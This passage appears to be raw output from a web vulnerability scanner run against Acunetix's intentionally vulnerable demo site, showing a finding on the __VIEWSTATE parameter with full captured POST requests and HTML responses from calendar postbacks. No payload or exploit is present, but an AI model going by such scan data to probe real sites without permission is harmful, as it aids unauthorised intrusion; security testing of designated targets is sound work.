href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:White" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1143 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,143 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8139&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgCA%2F7epHdoIZGRksejto5fiOBuApZ4yRrpsfix9Nnw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKxxeAXAqDc%2BbwPArrjr%2BwOAo333M8MAo333M8MAo338OIFAo338OIFAo335LkNAo335LkNAo33mNwGAo33mNwGAo33jPMPAo33jPMPAo33oJYHAo33oJYHAo331CoCjffUKgKN94iSDQKN94iSDQKN97ypBgKN97ypBgLmnY%2FeCQLmnY%2FeCQLmnaP1AgLmnaP1AgLmndeJCgLmndeJCgLmncusAwLmncusAwLmnf%2FDDALmnf%2FDDALmnZPmBQLmnZPmBQLmnYe9DQLmnYe9DQLmnbvQBgLmnbvQBgLmne%2B5AwLmne%2B5AwLmnYPcDALmnYPcDAL7pO3FDwL7pO3FDwL7pIGYBwL7pIGYBwL7pLU%2FAvuktT8C%2B6Sp0gkC%2B6Sp0gkC%2B6Td9gIC%2B6Td9gIC%2B6TxjQoC%2B6TxjQoC%2B6TloAMC%2B6TloAMC%2B6SZxwwC%2B6SZxwwC%2B6TNrAkC%2B6TNrAkC%2B6ThwwIC%2B6ThwwIC3Mvz6AUC3Mvz6AUC3Mvnjw0C3Mvnjw0C3MubogYC3MubogYC3MuP%2BQ8C3MuP%2BQ8C3MujnAcC3MujnAcC3MvXMALcy9cwAtzLy9cJAtzLy9cJAtzL%2F%2BoCAtzL%2F%2BoCAtzL09MPAtzL09MPAtzLx%2FYIAtzLx%2FYIArHS0Z8KArHS0Z8KArHSxbIDArHSxbIDArHS%2BckMArHS%2BckMsfu5WYCEySk1ovYNhGGbDow97TU%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:30:17 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgCA/7epHdoIZGRksejto5fiOBuApZ4yRrpsfix9Nnw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKxxeAXAqDc+bwPArrjr+wOAo333M8MAo333M8MAo338OIFAo338OIFAo335LkNAo335LkNAo33mNwGAo33mNwGAo33jPMPAo33jPMPAo33oJYHAo33oJYHAo331CoCjffUKgKN94iSDQKN94iSDQKN97ypBgKN97ypBgLmnY/eCQLmnY/eCQLmnaP1AgLmnaP1AgLmndeJCgLmndeJCgLmncusAwLmncusAwLmnf/DDALmnf/DDALmnZPmBQLmnZPmBQLmnYe9DQLmnYe9DQLmnbvQBgLmnbvQBgLmne+5AwLmne+5AwLmnYPcDALmnYPcDAL7pO3FDwL7pO3FDwL7pIGYBwL7pIGYBwL7pLU/AvuktT8C+6Sp0gkC+6Sp0gkC+6Td9gIC+6Td9gIC+6TxjQoC+6TxjQoC+6TloAMC+6TloAMC+6SZxwwC+6SZxwwC+6TNrAkC+6TNrAkC+6ThwwIC+6ThwwIC3Mvz6AUC3Mvz6AUC3Mvnjw0C3Mvnjw0C3MubogYC3MubogYC3MuP+Q8C3MuP+Q8C3MujnAcC3MujnAcC3MvXMALcy9cwAtzLy9cJAtzLy9cJAtzL/+oCAtzL/+oCAtzL09MPAtzL09MPAtzLx/YIAtzLx/YIArHS0Z8KArHS0Z8KArHSxbIDArHSxbIDArHS+ckMArHS+ckMsfu5WYCEySk1ovYNhGGbDow97TU=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:White" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1121 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,121 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8127&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgCACrs7FNoIZGRkrx3c3l9R1w2%2FJ%2FFMb6JEoWr%2FVsQ%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLf5tilBwKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDLSy5DCx1Oirp9rKfTFaCUO2Hj7C
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:56:00 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgCACrs7FNoIZGRkrx3c3l9R1w2/J/FMb6JEoWr/VsQ=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLf5tilBwKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDLSy5DCx1Oirp9rKfTFaCUO2Hj7C" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network 